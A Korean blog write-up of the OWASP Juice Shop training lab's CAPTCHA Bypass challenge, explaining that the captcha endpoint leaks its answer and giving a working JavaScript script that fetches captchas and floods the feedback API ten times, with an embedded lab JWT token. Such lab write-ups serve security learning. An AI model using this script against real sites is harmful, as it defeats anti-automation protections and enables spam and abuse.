OWASP Juice Shop - 문의하기 Captcha Bypass (Broken Anti Automation)

🏴CTF/OWASP Juice Shop

OWASP Juice Shop - 문의하기 Captcha Bypass (Broken Anti Automation)

Janger 2023. 9. 27. 04:20

728x90

문의하기 페이지(/contact) 구성도

사용자로부터 평점과 댓글을 입력받는데 하단에 CAPTCHA 인증이 필요하다.

캡챠 요청 REST API 구조 (/rest/captcha/)

서버에서 미리 캡챠를 생성하는 SSR 방식이 아닌 클라이언트가 페이지에 들어오면 캡챠를 요청하는 CSR 방식임을 알 수 있다. 따라서 클라이언트가 "http://localhost:3000/rest/captcha/"로 GET을 요청하면 다음과 같은 응답이 온다.

{"captchaId":38,"captcha":"8*8-5","answer":"59"}

보다시피 캡챠 아이디, 문제, 정답이 그대로 전달이 된다.

캡챠 검증 REST API 구조 (/api/Feedbacks/)

사용자가 캡챠를 풀고 서버로부터 요청을 할 때는 "http://localhost:3000/api/Feedbacks/" 주소로 다음과 같은 페이로드를 보낸다.

{"UserId":22,"captchaId":35,"captcha":"27","comment":"comment (***acker@attacker.com)","rating":3}

캡챠의 정답을 클라이언트에게 그대로 전달하는 취약점을 이용해서 빠르게 10번을 캡챠 정답(문의하기)을 전송하는 스크립트를 짜보았다.

정답 스크립트

async function send_captcha( captchaId, answer ){

  await fetch("http://localhost:3000/api/Feedbacks/", {
    "headers": {
      "accept": "application/json, text/plain, */*",
      "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7",
      "authorization": "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjIsInVzZXJuYW1lIjoiaGVsbG8iLCJlbWFpbCI6ImF0dGFja2VyQGF0dGFja2VyLmNvbSIsInBhc3N3b3JkIjoiM2Y4NThjZjhjZmQ1OWYyNTAxMGU3MWI2YjU2NzE0MjgiLCJyb2xlIjoiZGVsdXhlIiwiZGVsdXhlVG9rZW4iOiIxMDg1NjY4ZDQ0ZjU4NWI1YTE3OTY3ZjYyZTZjNTZkM2RlMzllMTliZWNmZmNlNmRlNTJkMmZhYmRmNzVmZmJlIiwibGFzdExvZ2luSXAiOiIwLjAuMC4wIiwicHJvZmlsZUltYWdlIjoiL2Fzc2V0cy9wdWJsaWMvaW1hZ2VzL3VwbG9hZHMvMjIuanBnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTA5LTI2VDE3OjM2OjQ2LjY2MFoiLCJ1cGRhdGVkQXQiOiIyMDIzLTA5LTI2VDE4OjM0OjQ2LjM1NVoiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2OTU3NTMyODZ9.lhfZaCmblr1IPRXd8XpZePBSlJbEAzravr0Z8k5KSSshF_sUjMcMqztjzNprqtxQLlrZhWjDf4wov1f723qib7Z3EPEireG392GHy5RBQkpDNjlx0uHi4OQpPRD-Gbecj_BzT4zmfNZADnDn-m00ZMpZRUv_6CGMjpCgAyErRq4",
      "content-type": "application/json",
      "proxy-connection": "keep-alive",
      "sec-ch-ua": "\"Chromium\";v=\"117\", \"Not;A=Brand\";v=\"8\"",
      "sec-ch-ua-mobile": "?0",
      "sec-ch-ua-platform": "\"Windows\"",
      "sec-fetch-dest": "empty",
      "sec-fetch-mode": "cors",
      "sec-fetch-site": "same-origin"
    },
    "referrer": "http://localhost:3000/",
    "referrerPolicy": "strict-origin-when-cross-origin",
    "body": `{\"UserId\":22,\"captchaId\":${ captchaId },\"captcha\":\"${ answer }\",\"comment\":\"comment (***acker@attacker.com)\",\"rating\":0}`,
    "method": "POST",
    "mode": "cors",
    "credentials": "include"
  });

}


async function main(){
  response = await fetch("http://localhost:3000/rest/captcha/", {
    "headers": {
      "accept": "application/json, text/plain, */*",
      "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7",
      "authorization": "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjIsInVzZXJuYW1lIjoiaGVsbG8iLCJlbWFpbCI6ImF0dGFja2VyQGF0dGFja2VyLmNvbSIsInBhc3N3b3JkIjoiM2Y4NThjZjhjZmQ1OWYyNTAxMGU3MWI2YjU2NzE0MjgiLCJyb2xlIjoiZGVsdXhlIiwiZGVsdXhlVG9rZW4iOiIxMDg1NjY4ZDQ0ZjU4NWI1YTE3OTY3ZjYyZTZjNTZkM2RlMzllMTliZWNmZmNlNmRlNTJkMmZhYmRmNzVmZmJlIiwibGFzdExvZ2luSXAiOiIwLjAuMC4wIiwicHJvZmlsZUltYWdlIjoiL2Fzc2V0cy9wdWJsaWMvaW1hZ2VzL3VwbG9hZHMvMjIuanBnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTA5LTI2VDE3OjM2OjQ2LjY2MFoiLCJ1cGRhdGVkQXQiOiIyMDIzLTA5LTI2VDE4OjM0OjQ2LjM1NVoiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2OTU3NTMyODZ9.lhfZaCmblr1IPRXd8XpZePBSlJbEAzravr0Z8k5KSSshF_sUjMcMqztjzNprqtxQLlrZhWjDf4wov1f723qib7Z3EPEireG392GHy5RBQkpDNjlx0uHi4OQpPRD-Gbecj_BzT4zmfNZADnDn-m00ZMpZRUv_6CGMjpCgAyErRq4",
      "if-none-match": "W/\"30-7viQ7Y3xjsbQxoUr1EBBZrALhTY\"",
      "proxy-connection": "keep-alive",
      "sec-ch-ua": "\"Chromium\";v=\"117\", \"Not;A=Brand\";v=\"8\"",
      "sec-ch-ua-mobile": "?0",
      "sec-ch-ua-platform": "\"Windows\"",
      "sec-fetch-dest": "empty",
      "sec-fetch-mode": "cors",
      "sec-fetch-site": "same-origin"
    },
    "referrer": "http://localhost:3000/",
    "referrerPolicy": "strict-origin-when-cross-origin",
    "body": null,
    "method": "GET",
    "mode": "cors",
    "credentials": "include"
  });


  response_json = await response.json();

  captchaId = response_json.captchaId;
  answer = response_json.answer;
  
  send_captcha( captchaId, answer );

}

for(var i=0; i<10; i++)
  main();

"성공적으로 도전과제를 풀었습니다: CAPTCHA Bypass (Submit 10 or more customer feedbacks within 20 seconds.)"

평점을 0으로 줘서("rating":0) 다른 도전과제도 한 번에 해결해주자

728x90